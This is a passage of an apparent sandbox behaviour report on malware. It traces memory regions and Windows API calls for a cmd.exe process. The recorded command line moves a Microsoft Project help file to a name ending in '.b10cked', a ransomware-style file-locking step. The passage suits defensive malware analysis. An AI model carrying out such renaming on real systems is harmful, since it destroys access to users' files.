private name = "private_0x0000000000010000" filename = "" Region: id = 29442 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29443 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29444 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 29445 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29446 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29447 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29448 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29449 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 29450 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30221 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30222 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30223 start_va = 
0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30224 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 30225 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 30226 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30227 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30228 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30229 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30230 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30231 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30232 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" 
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30233 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30234 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30235 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 30236 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30237 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30238 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 30239 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 30240 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 30241 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 30242 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 30243 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: 
id = 30244 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 30272 start_va = 0x400000 end_va = 0x4bffff entry_point = 0x400000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 680 os_tid = 0x55c [0204.380] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fc5c | out: lpSystemTimeAsFileTime=0x18fc5c*(dwLowDateTime=0xaea0de80, dwHighDateTime=0x1d440a9)) [0204.380] GetCurrentProcessId () returned 0xc84 [0204.380] GetCurrentThreadId () returned 0x55c [0204.380] GetTickCount () returned 0x399af [0204.380] QueryPerformanceCounter (in: lpPerformanceCount=0x18fc54 | out: lpPerformanceCount=0x18fc54*=26116957856) returned 1 [0204.381] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0204.381] __set_app_type (_Type=0x1) [0204.381] __p__fmode () returned 0x76b331f4 [0204.381] __p__commode () returned 0x76b331fc [0204.381] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0204.382] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0204.382] GetCurrentThreadId () returned 0x55c [0204.382] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x55c) returned 0x38 [0204.382] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.382] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0204.382] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.382] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.382] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, 
samDesired=0x20019, phkResult=0x18fbec | out: phkResult=0x18fbec*=0x0) returned 0x2 [0204.382] VirtualQuery (in: lpAddress=0x18fc23, lpBuffer=0x18fbbc, dwLength=0x1c | out: lpBuffer=0x18fbbc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.382] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fbbc, dwLength=0x1c | out: lpBuffer=0x18fbbc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0204.382] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fbbc, dwLength=0x1c | out: lpBuffer=0x18fbbc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0204.383] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fbbc, dwLength=0x1c | out: lpBuffer=0x18fbbc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.383] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fbbc, dwLength=0x1c | out: lpBuffer=0x18fbbc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0204.383] GetConsoleOutputCP () returned 0x1b5 [0204.383] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.383] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0204.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.383] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0204.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.383] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.383] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.384] 
_get_osfhandle (_FileHandle=0) returned 0x3 [0204.384] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.384] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.384] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0204.384] GetEnvironmentStringsW () returned 0x240190* [0204.384] FreeEnvironmentStringsW (penv=0x240190) returned 1 [0204.385] GetEnvironmentStringsW () returned 0x240190* [0204.385] FreeEnvironmentStringsW (penv=0x240190) returned 1 [0204.385] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eb5c | out: phkResult=0x18eb5c*=0x40) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x0, lpData=0x18eb68*=0xb8, lpcbData=0x18eb60*=0x1000) returned 0x2 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x1, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x0, lpData=0x18eb68*=0x1, lpcbData=0x18eb60*=0x1000) returned 0x2 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x0, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x40, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", 
lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x40, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x0, lpData=0x18eb68*=0x40, lpcbData=0x18eb60*=0x1000) returned 0x2 [0204.385] RegCloseKey (hKey=0x40) returned 0x0 [0204.385] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eb5c | out: phkResult=0x18eb5c*=0x40) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x0, lpData=0x18eb68*=0x40, lpcbData=0x18eb60*=0x1000) returned 0x2 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x1, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x0, lpData=0x18eb68*=0x1, lpcbData=0x18eb60*=0x1000) returned 0x2 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x0, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.385] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x9, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.386] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, 
lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x4, lpData=0x18eb68*=0x9, lpcbData=0x18eb60*=0x4) returned 0x0 [0204.386] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eb64, lpData=0x18eb68, lpcbData=0x18eb60*=0x1000 | out: lpType=0x18eb64*=0x0, lpData=0x18eb68*=0x9, lpcbData=0x18eb60*=0x1000) returned 0x2 [0204.386] RegCloseKey (hKey=0x40) returned 0x0 [0204.386] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a6 [0204.386] srand (_Seed=0x5b8863a6) [0204.386] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked\"" [0204.386] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked\"" [0204.386] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.386] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2418f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0204.386] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0204.387] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.387] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.387] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0204.387] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0204.387] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 
[0204.387] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0204.387] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0204.387] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0204.387] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0204.387] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0204.387] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0204.387] GetEnvironmentStringsW () returned 0x2422e0* [0204.387] FreeEnvironmentStringsW (penv=0x2422e0) returned 1 [0204.387] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.387] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.387] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0204.387] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0204.387] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0204.387] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0204.387] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0204.387] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0204.387] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0204.387] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0204.387] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f928 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f928, lpFilePart=0x18f924 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f924*="Desktop") returned 0x18 [0204.388] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.388] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f6a4 | out: 
lpFindFileData=0x18f6a4) returned 0x240020 [0204.388] FindClose (in: hFindFile=0x240020 | out: hFindFile=0x240020) returned 1 [0204.388] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f6a4 | out: lpFindFileData=0x18f6a4) returned 0x240020 [0204.388] FindClose (in: hFindFile=0x240020 | out: hFindFile=0x240020) returned 1 [0204.388] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f6a4 | out: lpFindFileData=0x18f6a4) returned 0x240020 [0204.388] FindClose (in: hFindFile=0x240020 | out: hFindFile=0x240020) returned 1 [0204.388] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.388] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0204.388] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0204.388] GetEnvironmentStringsW () returned 0x242b00* [0204.389] FreeEnvironmentStringsW (penv=0x242b00) returned 1 [0204.389] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.389] GetConsoleOutputCP () returned 0x1b5 [0204.389] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.389] GetUserDefaultLCID () returned 0x409 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fa68, cchData=128 | out: lpLCData="0") returned 2 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fa68, cchData=128 | out: lpLCData="0") returned 2 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fa68, cchData=128 | out: lpLCData="1") returned 2 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 
[0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0204.390] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0204.391] GetConsoleTitleW (in: lpConsoleTitle=0x2308e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.391] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.392] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0204.392] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0204.392] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0204.392] _wcsicmp (_String1="move", _String2=")") returned 68 [0204.393] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0204.393] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0204.393] _wcsicmp (_String1="IF", _String2="move") returned -4 [0204.393] _wcsicmp 
(_String1="IF/?", _String2="move") returned -4 [0204.393] _wcsicmp (_String1="REM", _String2="move") returned 5 [0204.393] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0204.395] GetConsoleTitleW (in: lpConsoleTitle=0x18f760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.396] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0204.396] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0204.396] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0204.396] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0204.396] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0204.396] _wcsicmp (_String1="move", _String2="CD") returned 10 [0204.396] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0204.396] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0204.396] _wcsicmp (_String1="move", _String2="REN") returned -5 [0204.396] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0204.396] _wcsicmp (_String1="move", _String2="SET") returned -6 [0204.396] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0204.396] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0204.396] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0204.396] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0204.396] _wcsicmp (_String1="move", _String2="MD") returned 11 [0204.396] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0204.396] _wcsicmp (_String1="move", _String2="RD") returned -5 [0204.396] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0204.396] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0204.396] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0204.396] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0204.396] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0204.396] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0204.396] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0204.396] 
_wcsicmp (_String1="move", _String2="VER") returned -9 [0204.396] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0204.396] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0204.396] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0204.396] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0204.396] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0204.396] _wcsicmp (_String1="move", _String2="START") returned -6 [0204.396] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0204.396] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0204.396] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0204.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.398] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f51c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f514, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f514*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) 
returned -5 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", 